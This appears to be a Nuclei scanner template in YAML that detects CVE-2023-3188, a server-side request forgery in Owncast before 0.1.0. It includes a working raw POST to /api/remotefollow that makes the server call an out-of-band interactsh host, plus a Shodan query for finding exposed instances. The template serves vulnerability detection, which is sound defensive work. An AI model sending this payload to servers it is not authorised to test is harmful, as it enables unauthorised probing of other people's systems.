55 lines
1.4 KiB
YAML
55 lines
1.4 KiB
YAML
id: CVE-2023-3188
|
|
|
|
info:
|
|
name: Owncast - Server Side Request Forgery
|
|
author: DhiyaneshDk
|
|
severity: medium
|
|
description: |
|
|
Server-Side Request Forgery (SSRF) in GitHub repository owncast/owncast prior to 0.1.0.
|
|
reference:
|
|
- https://owncast.online/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3188
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2023-3188
|
|
cwe-id: CWE-918
|
|
epss-score: 0.00098
|
|
epss-percentile: 0.41558
|
|
cpe: cpe:2.3:a:owncast_project:owncast:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: owncast_project
|
|
product: owncast
|
|
shodan-query: html:"owncast"
|
|
tags: cve,cve2023,owncast,oast,ssrf
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/remotefollow HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
{"account":"a@{{interactsh-url}}"}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'success":'
|
|
- 'message":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: content_type
|
|
words:
|
|
- "application/json"
|
|
# digest: 4a0a00473045022100cd0a02bbff07a5686c8908b71a2b140203adb21104d5b712e92c639711e45dd9022075e275d1cd5f964d04b1fd916f516546aef3ef9064fc3666aede7343416e5c45:922c64590222798bb761d5b6d8e72950 |